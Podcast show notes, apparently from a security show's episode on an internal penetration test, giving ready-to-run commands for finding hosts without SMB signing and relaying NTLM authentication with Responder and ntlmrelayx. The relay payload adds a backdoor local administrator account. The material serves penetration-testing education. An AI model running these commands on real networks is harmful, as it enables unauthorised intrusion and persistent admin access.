Jul 15, 2019
Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://pro.tv/7minute
Today I share the (hopefully) exciting and fun conclusion to last week's episode about a tale of internal pentest pwnage! A few important notes from today's episode:
opt/responder/tools/RunFinger.py -i THE.SUBNET.YOU-ARE.ATTACKING/24 -g > hosts.txt grep "Signing:'False'" hosts.txt | grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' > targets.txt
Source: Pwning internal networks automagically
responder.conf
and turn SMB
and
HTTP
to Off
, then get Responder running
in one window, and ntlmrelayx in
another. Specifically, I like to use ntlmrelayx.py -tf
targets.txt
where targets.txt is the list of
machines you found that are not using SMB signing. I also
like to add a -c
to run a string of my choice. Check
out this fun evil little nugget: net user /add ladmin1 s00p3rn4ughtyguy! /Y & net localgroup Administrators ladmin1 /add & net localgroup "Remote Desktop Users" ladmin1 /add
So the full command would be:
ntlmrelayx.py -tf targets.txt -c 'net user /add ladmin1 s00p3rn4ughtyguy! /Y & net localgroup Administrators ladmin1 /add & net localgroup "Remote Desktop Users" ladmin1 /add'
Check today's show notes at https://7ms.us for more information!